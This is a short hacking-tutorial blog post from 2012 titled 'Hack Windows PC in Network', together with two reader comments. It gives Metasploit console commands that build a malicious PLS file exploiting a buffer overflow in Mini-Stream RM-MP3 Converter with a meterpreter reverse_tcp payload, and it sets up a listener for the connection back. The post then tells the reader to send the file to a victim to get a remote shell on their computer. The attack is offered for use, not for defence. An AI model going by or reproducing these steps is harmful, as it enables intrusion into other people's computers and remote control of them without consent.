Dear Readers: PWNSCAR is planning to publish a monthly Tech Magazine along with some other blogs. To Contribute CHECK DETAILS

ABOUT ME

17 Apr 2012

Hack Windows PC in Network using Mini-Stream RM-MP3 Converter Buffer Overflow Attack

Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow

This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.

Exploit Targets


Mini-stream RM-MP3 Converter v3.1.2

Requirement


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole



Now type use exploit/windows/fileformat/mini_stream_pls_bof

Msf exploit (mini_stream_pls_bof) set payload windows/meterpreter/reverse_tcp

Msf exploit (mini_stream_pls_bof)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (mini_stream_pls_bof)>exploit







After we successfully generate the malicious MP3, it will stored on your local computer

/root/.msf4/local/msf.pls



Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer



2 comments:

  1. can we use this exploit over internet???

    ReplyDelete
  2. you can only apply this attack over a network

    ReplyDelete

Got any doubts or feedbacks ?
Feel free to comment !